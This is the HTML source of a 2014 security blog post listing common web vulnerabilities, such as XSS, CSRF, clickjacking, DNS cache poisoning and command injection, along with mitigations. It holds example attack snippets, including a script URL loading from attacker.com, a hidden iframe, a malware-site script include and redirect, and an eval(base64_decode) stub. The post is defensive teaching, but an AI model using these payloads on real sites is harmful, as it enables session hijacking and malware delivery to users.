-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy patha-list-of-common-web-vulnerabilities.html
429 lines (388 loc) · 25.8 KB
/
a-list-of-common-web-vulnerabilities.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>A List of Common Web Vulnerabilities</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="Marina von Steinkirch">
<!-- Le styles -->
<link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.tag-1 {
font-size: 13pt;
}
.tag-2 {
font-size: 11pt;
}
.tag-2 {
font-size: 10pt;
}
.tag-4 {
font-size: 8pt;
}
</style>
<link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
<link href="./theme/css/font-awesome.css" rel="stylesheet">
<link href="./theme/css/pygments.css" rel="stylesheet">
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="./theme/images/favicon.ico">
<link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">
<link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<a class="brand" href="./index.html">chmod +x singularity.sh </a>
<div class="nav-collapse">
<ul class="nav">
<li class="divider-vertical"></li>
<ul class="nav pull-right">
<li><a href="./authors.html">About</a></li>
<li><a href="./archives.html"><b>Archives</b></a></li>
<li>
<a href="https://github.com/bt3gl">github
<!--<i class="icon-github-sign icon-large" ></i>-->
</a></li>
<li>
<a href="https://twitter.com/1bt337">
<!--<i class="icon-twitter-sign icon-large"></i> -->
twitter
</a></li>
<li><a href="http://bt3gl.github.io/projects_page/index.html">Bygone Playful Times
</a></li>
</ul>
</ul>
<!--<p class="navbar-text pull-right">Logged in as <a href="#">username</a></p>-->
</div><!--/.nav-collapse -->
</div>
</div>
</div>
<div class="container-fluid">
<div class="row">
<div class="span9" id="content">
<section id="content">
<article>
<header>
<h1>
<a href=""
rel="bookmark"
title="Permalink to A List of Common Web Vulnerabilities">
A List of Common Web Vulnerabilities
</a>
</h1>
</header>
<div class="entry-content">
<div class="well">
<footer class="post-info">
<abbr class="published" title="2014-10-31T06:30:00">
Fri 31 October 2014 </abbr>
<span class="label"> Category</span>
<a href="./category/web-security.html"><i class="icon-folder-open"></i>Web Security</a>
<span class="label">Tags</span>
<a href="./tag/xss.html"><i class="icon-tag"></i>XSS</a>
<a href="./tag/csrf.html"><i class="icon-tag"></i>CSRF</a>
<a href="./tag/xssi.html"><i class="icon-tag"></i>XSSI</a>
<a href="./tag/buffer_overflow.html"><i class="icon-tag"></i>Buffer_Overflow</a>
<a href="./tag/lfi.html"><i class="icon-tag"></i>LFI</a>
<a href="./tag/rfi.html"><i class="icon-tag"></i>RFI</a>
<a href="./tag/iframe.html"><i class="icon-tag"></i>iframe</a>
<a href="./tag/sqli.html"><i class="icon-tag"></i>SQLi</a>
</footer><!-- /.post-info --> </div>
<p>Although nomenclatures don't help much when you are facing a security problem, I am keeping this list for a systematic organization. It is constantly been updated.</p>
<p>In addition to this list, you can check some specific web exploration older posts: <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Exploiting the web in 20 lessons</a> and <a href="http://bt3gl.github.io/exploring-d-ctf-quals-2014s-exploits.html">D-Camp CTF 2014</a>.</p>
<h1>Vulnerabilities to Web Applications</h1>
<h2>Cross-site Scripting (XSS)</h2>
<p>XSS is caused by <strong>insufficient input validation or output escaping</strong>. This can allow an attacker to insert HTML markup or scripts in a vulnerable website. The injected code will have plenty of access in this site, and in many cases, to the HTTP cookies stored by the client.</p>
<p>HTML has five characters that are reserved:</p>
<ul>
<li>
<p><strong>both angle brackets</strong>,</p>
</li>
<li>
<p><strong>single and double quotes</strong>,</p>
</li>
<li>
<p>and <strong>ampersand</strong>.</p>
</li>
</ul>
<p>The ampersand should never appear in most HTML sections. Both angle brackets should not be used inside a tag, unless properly quoted. Quote characters inside a tag can also be harmless in text.</p>
<p>To allow these characters to appear in problematic locations, an encoding based in an ampersand-prefixed and a semicolon-terminated scheme is used: the <a href="http://www.w3schools.com/html/html_entities.asp">Entity Encoding</a>.</p>
<h3>Non-Persistent Attack:</h3>
<p>XSS non-persistent attacks consist on getting users to click a link with attacker's script. A typical scenario is the following:</p>
<ol>
<li>The target website perform query searches that are not sanitized. For example, the query could accept scripts on it. A simple example to check this vulnerability is by verifying whether the alert box with the message <strong>Pwnd</strong> is displayed:</li>
</ol>
<div class="highlight"><pre><span class="nx">http</span><span class="p">:</span><span class="c1">//website.org?q=<script%20type='text/javascript'>alert('Pwnd!');</script></span>
</pre></div>
<ol>
<li>The attacker crafts an exploit script that gets the victim's authorization information (for example in an <strong>Authorization Cookie</strong>). The attacker sends a <strong>phishing email</strong> to the victim with a link with some script such as:</li>
</ol>
<div class="highlight"><pre><span class="nl">http:</span><span class="c1">//website.org?q=puppies<script%20src="http://attacker.com/exploit.js"></span>
</pre></div>
<ol>
<li>If the victim clicks in the link, her/his browser runs the script (legitimate by the <strong>Same Origin Policy</strong>, <em>i.e</em> resources are shared between origins with same protocol, domain and port). The attacker now has control of the victim's identity in that website. If the victim is the administrator, it is game over.</li>
</ol>
<h3>Persistent Attack:</h3>
<p>XSS persistent attacks store a malicious script in the databases, which will retrieved by the users. A typical scenario is the following:</p>
<ol>
<li>
<p>The attacker verifies that the target website has a XSS stored vulnerability (for example, allowing her/him to post text with HTML tags).</p>
</li>
<li>
<p>The attacker creates an account in the target website and posts something with a hidden script (similar to the one above).</p>
</li>
<li>
<p>When anyone loads the page with that post, the script runs, and the attacker is able to hijack the victim's section.</p>
</li>
</ol>
<p>Additionally, in <em>password managers</em>, there is a risk of amplification of XSS bugs. In the web applications that use <em><a href="https://www.owasp.org/index.php/HttpOnly">httponly</a></em> cookies, a successful exploitation of an XSS flaw may give the attacker a transient access to the user's account (and password).</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>
<p>Servers should should use <strong>Content Security Policy</strong> (CSP) HTTP header, which allow the whitelist of resources contents. For instance, the <em>Content-Security-Policy</em> header disables inline JavaScript by default.</p>
</li>
<li>
<p>Servers can use the <strong>HttpOnly</strong> HTTP header which allows to set a cookie that is unavailable to client-side scripts.</p>
</li>
<li>
<p>Search inputs should <em>always</em> be sanitized in both server-side and client-side.</p>
</li>
<li>
<p>Servers should redirect invalid requests.</p>
</li>
<li>
<p>Servers should invalidate sessions from different IP addresses. However this can be mitigate if the attacker is behind a web proxy or behind the same NAT IP.</p>
</li>
<li>
<p>Clients should disabling scripts by default (for example with <a href="https://addons.mozilla.org/en-us/firefox/addon/noscript/">NoScript</a>).</p>
</li>
</ul>
<hr />
<h2>Cross Script Inclusion (XSSI)</h2>
<p>XSSI comes with the failure to secure sensitive JSON-like responses against being loaded on third-party sites via <code><script src=..></code>, and leaking user-specific information in the response. It a risk whenever ambient authority credentials (such as cookies) are used by the server to generate user-specific JavaScript code.</p>
<p>For instance, JSON is a JavaScript syntax structure to keep in-place object serialization. The curly bracket <strong>{</strong> is assumed to be the beginning of the object. Overloading curly brackets means that JSON blocks will not be recognized properly in standalone statements.</p>
<hr />
<h2>Cross-site Request Forgery (CSRF, XSRF)</h2>
<p>CSRF allows attackers to execute actions using the credentials of another user without that user's knowledge or consent. It is the failure to verify that a particular state-changing HTTP request received by the <strong>server-side</strong> portion of the application was initiated from the expected <strong>client-side</strong> origin. Any third-party website loaded in the browser can perform actions in behalf of the victim.</p>
<p>On cross-domain navigation, the browser includes any ambient credentials. To the server, a request originating from its own client-side code will appear as the same as the request from a rogue third-party site and it might be granted the same privilege.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>
<p>Any two windows with frames opened in a browser will remain <strong>Same Origin</strong> with each other even if the user logs out from one account and permitting third-party to submit password and username and log int an attacked account. For example, the attacker can open and keep a frame pointing to a sensitive page and then log the victim into the attacker-controlled account to execute some code injection. Despite the change of HTTP credentials the code injected will access the previous loaded frame.</p>
</li>
<li>
<p>In several home network routers, CSRF can permit attackers to access the device and intercept or modify the network traffic.</p>
</li>
</ul>
<h3>Attempts of mitigation:</h3>
<ul>
<li>
<p>A protection can be done by checking a nonce in each POST request (no replay attacks in a form POST).</p>
</li>
<li>
<p>Including a secret user- and session- specific value on the requests (as an additional query parameter or a hidden field). The attacker will not be able to read the value since access to cross-domain documents is restricted by the <strong>same-origin</strong> policy.</p>
</li>
</ul>
<hr />
<h2>Header Injection (Response Splitting)</h2>
<p>Insufficient escaping of newlines in HTTP responses, generated by the server-side. This can lead to XSS or proxy cache poisoning.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>LF and CR characters must be stripped from any attacker-controlled values in the HTTP headers.</li>
</ul>
<hr />
<h2>Mixed Content</h2>
<p>Loading non-HTTPS sub-resources on HTTPS pages undoes most of the benefits of encryption. For scripts and applets, this makes the application vulnerable to active attackers, specially in open wireless networks.</p>
<hr />
<h2>Open Redirection</h2>
<p>Applications that perform HTTP- or script-based requests to user-supplied URLs without constraining the possible destinations in any meaningful way, leading, for example, to XSS.</p>
<hr />
<h2>Referer Leakage</h2>
<p>HTTP requests may include a <em>Referer</em> header that contains the URL of documents that triggered the current navigation in some way. The header also may reveal some information about the user browsing habits, such as query parameters in the referring page.</p>
<p>This vulnerability is created by disclosure of a sensitive URL by embedding an off-site sub-resource of providing an off-site link. Any security data encoded in the URL of the parent document will be leaked in the <em>Referer</em> header.</p>
<hr />
<h1>Vulnerabilities to Web Application Design</h1>
<h2>Cache Poising</h2>
<p>Long-term pollution of the browser cache (or any proxy within) with a malicious version of the targeted web application. Encrypted web applications may be targeted due to response-splitting vulnerabilities. In non-encrypted traffic, network attackers may be able to modify responses too.</p>
<hr />
<h2>Clickjacking</h2>
<p>The act of obscuring a portion of a web application so that the victim is not aware that individual clicks are delivered to other site. For example, a malicious site wraps another site in a frame.</p>
<p>If a website includes iframe, there is a chance that it can perform a SQL query searching for iframe code. For example:</p>
<div class="highlight"><pre><span class="n">SELECT</span> <span class="o">*</span> <span class="n">FROM</span> <span class="n">blog_posts</span> <span class="n">WHERE</span> <span class="n">post_text</span> <span class="n">LIKE</span> <span class="err">'</span><span class="o">%></span><span class="n">iframe</span><span class="o">%</span><span class="err">'</span><span class="p">;</span>
</pre></div>
<hr />
<h2>Content and Character Set Sniffing</h2>
<p>Possibility that the browser will ignore any authoritative content type of character set information provided by the server and interpret the returned document incorrectly.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Scenarios where <a href="http://www.w3.org/Protocols/rfc1341/4_Content-Type.html">Content-Type</a> is ignored.</li>
</ul>
<hr />
<h2>Cookie Forcing/Injection</h2>
<p>Possibility of blindly injecting HTTP cookies into the context of an otherwise impenetrable web application due to issues in how the mechanism is designed and implemented in browsers. There are special concern to HTTPS applications.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Cookie stuffing: deleting cookies belonging to another applications by overflowing the cookie jar.</li>
</ul>
<hr />
<h2>Denial-of-Service (DoS)</h2>
<p>Any opportunity of the attacker to bring down a browser or server, or make the use of a targeted application more difficult.</p>
<h3>DoS and amplification attacks</h3>
<p>DNS resolvers are attractive targets to attackers who exploit the resolvers' large response-to-request size ratio to gain additional free bandwidth. Resolvers that support EDNS0 (Extension Mechanisms for DNS) are especially vulnerable because of the substantially larger packet size that they can return.</p>
<h3>Examples of exploitation:</h3>
<p>In an amplification scenario, the attack proceeds as follows:</p>
<ul>
<li>The attacker sends a victim DNS server queries using a forged source IP address. The queries may be sent from a single system or a network of systems all using the same forged IP address. The queries are for records that the attacker knows will result in much larger responses, up to several dozen times1 the size of the original queries..</li>
<li>The victim server sends the large responses to the source IP address passed in the forged requests, overwhelming the system and causing a DoS situation.</li>
</ul>
<hr />
<h2>Framebusting</h2>
<p>The possibility of a framed page navigating the top-level document to a new URL without having to satisfy <strong>same-origin</strong> checks. It might be exploited for phishing.</p>
<hr />
<h2>HTTP Downgrade</h2>
<p>Ability of an attacker to prevent the user from reaching an HTTPS version of a site or to downgrade an existing HTTPS session to HTTP.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li><a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">Strict transport security</a>: The approach allows any site to instruct the browser that all future requests made to a particular hostname or domain should always use HTTPS and that any HTTP traffic should be automatically upgraded and submitted over HTTPS.</li>
</ul>
<hr />
<h2>Network Fenceposts</h2>
<p>When websites let the browser to interact with destinations not directly accessible to the attacker, for example, with the systems on a victim's internal networks. This attack can be performed with help of <a href="http://en.wikipedia.org/wiki/DNS_rebinding">DNS rebinding</a>.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>Internet Explorer implements the zone model, a potential approach to the risk.</li>
</ul>
<hr />
<h1>Vulnerabilities in the Server-Side</h1>
<h2>Buffer Overflow</h2>
<p>In low-level languages such as C or C++, buffer overflow happens when a program allows more information to be stored in a particular memory region than there is space to accommodate the incoming data, leading to the unexpected overwrite of other vital data structures.</p>
<hr />
<h2>Command Injection (SQL, PHP, Shellcode)</h2>
<p>Due to insufficient input filtering or output escaping, an attacker-controlled strings may be processed as statements in an interpreted language used by the application.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Malicious code injections in an iframe to the attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt"><iframe</span> <span class="na">frameborder=</span><span class="s">"0"</span> <span class="na">height=</span><span class="s">"0"</span> <span class="na">src=</span><span class="s">"http://<attack-site>/path/file"</span> <span class="na">style=</span><span class="s">"display:none"</span> <span class="na">width=</span><span class="s">"0"</span><span class="nt">></iframe></span>
</pre></div>
<ul>
<li>JavaScript or another scripting language that calls and runs scripts from an attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt"><script</span> <span class="na">type=</span><span class="s">'text/javascript'</span> <span class="na">src=</span><span class="s">'http://malware-attack-site/js/x55.js'</span><span class="nt">></script></span>
</pre></div>
<ul>
<li>Scripts that redirects the browser to an attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt"><script></span>
if (document.referrer.match(/google\.com/)) {
window.location("http://malware-attack-site/");
}
<span class="nt"></script></span>
</pre></div>
<ul>
<li>Malicious code that is obfuscated to avoid detection:</li>
</ul>
<div class="highlight"><pre><span class="n">eval</span><span class="p">(</span><span class="n">base64_decode</span><span class="p">(</span><span class="s">"aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"</span><span class="p">));</span>
</pre></div>
<ul>
<li>Shared object files designed to randomly write harmful code to otherwise benign scripts:</li>
</ul>
<div class="highlight"><pre><span class="cp">#httpd.conf modified by the hacker</span>
<span class="n">LoadModule</span> <span class="n">harmful_module</span> <span class="n">modules</span><span class="o">/</span><span class="n">mod_harmful</span><span class="p">.</span><span class="n">so</span>
<span class="n">AddModule</span> <span class="n">mod_harmful</span><span class="p">.</span><span class="n">c</span>
</pre></div>
<ul>
<li>The <strong>Error template type of malware infection</strong> occurs when the template used for error messages, such as 404 File not Found, is configured to distribute malware. In this way, attackers can launch attacks on URLs that do not even exist on the victim's website.</li>
</ul>
<h3>Attempts of mitigation:</h3>
<ul>
<li>Investigate all possible harmful code on the website. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are "script", "eval", and "unescape." For example, on Unix-based systems:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>grep -irn <span class="s2">"iframe"</span> ./ | less
</pre></div>
<hr />
<h2>Directory Traversal</h2>
<p>Due to insufficient filtering (such as the failure to recognize <code>../</code> segments) an application can be tricked into reading or writing files at arbitrary locations. Unconstrained file-writing bugs can be exploitable to run attacker-supplied code.</p>
<hr />
<h2>File Inclusion</h2>
<p>If used without a qualifier or prefixed with a <em>local</em> (LFI), the term is synonymous to read-related directory traversal. Remote file inclusion (RFI) is an alternative way to exploit file-inclusion vulnerabilities by specifying a URL rather than a valid file path. In some languages, a common API opens local files and fetches remote URLS, which might supplies the ability of retrieving attacker's files.</p>
<hr />
<h2>Format String Vulnerability</h2>
<p>Several libraries accept templates (format strings) followed by a set of parameters that the function is expected to insert into the template at predefined locations. For example, C has functions such as <em>printf</em>, <em>syslog</em>, etc. The vulnerability is caused by permitting attackers to supply the template to one of these functions. This can lead to data leaks and code execution.</p>
<hr />
<h2>Integer Overflow</h2>
<p>Vulnerability specific to languages with no range checking. The flaw is caused by the developer failing to detect that an integer exceeded the maximum possible value and rolled back to zero, to a large negative integer, or to some hardware-specific result.</p>
<p>Integer underflow is the opposite effect: crossing the minimum value and rolling over to a very large positive integer.</p>
<hr />
<h2>Pointer Management Vulnerabilities</h2>
<p>In languages that use raw memory pointers such as C or C++, it is possible to use pointers that are either unitized or nor longer valid (dangling). These vulnerabilities will corrupt the internal state of the program and allow an attacker to execute attacker-supplied code.</p>
<hr />
<h2>Cache poisoning attacks</h2>
<p>Several variants of DNS spoofing attacks that can result in cache poisoning.</p>
<h3>Example of Attack</h3>
<ol>
<li>
<p>The attacker sends a target DNS resolver multiple queries for a domain name for which she/he knows the server is not authoritative, and that is unlikely to be in the server's cache.</p>
</li>
<li>
<p>The resolver sends out requests to other nameservers (whose IP addresses the attacker can also predict).</p>
</li>
<li>
<p>In the meantime, the attacker floods the victim server with forged responses that appear to originate from the delegated nameserver. The responses contain records that ultimately resolve the requested domain to IP addresses controlled by the attacker. They might contain answer records for the resolved name or, worse, they may further delegate authority to a nameserver owned by the attacker, so that s/he takes control of an entire zone.</p>
</li>
<li>
<p>If one of the forged responses matches the resolver's request (for example, by query name, type, ID and resolver source port) and is received before a response from the genuine nameserver, the resolver accepts the forged response and caches it, and discards the genuine response.</p>
</li>
<li>
<p>Future queries for the compromised domain or zone are answered with the forged DNS resolutions from the cache. If the attacker has specified a very long time-to-live on the forged response, the forged records stay in the cache for as long as possible without being refreshed.</p>
</li>
</ol>
<hr />
<h1>References:</h1>
<ul>
<li><a href="http://www.amazon.com/The-Tangled-Web-Securing-Applications/dp/1593273886">The Tangled Web</a></li>
<li><a href="https://docs.djangoproject.com/en/dev/topics/security/">Django Security</a></li>
<li><a href="https://docs.djangoproject.com/en/dev/topics/security/">Bleach: Sanitizing Tool in Python</a></li>
<li><a href="https://developers.google.com/speed/public-dns/docs/security">Google's Public DNS</a></li>
</ul>
</div><!-- /.entry-content -->
<div class="comments">
<h2>Comments !</h2>
<div id="disqus_thread"></div>
<script type="text/javascript">
var disqus_identifier = "a-list-of-common-web-vulnerabilities.html";
(function() {
var dsq = document.createElement('script');
dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = 'http://bt3gl.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] ||
document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
</div>
</article>
</section>
</div><!--/span-->
</div><!--/row-->
<footer>
<address id="about">
</address><!-- /#about -->
</footer>
</div><!--/.fluid-container-->
<script src="./theme/js/jquery-1.7.2.min.js"></script>
<script src="./theme/js/bootstrap.min.js"></script>
</body>
</html>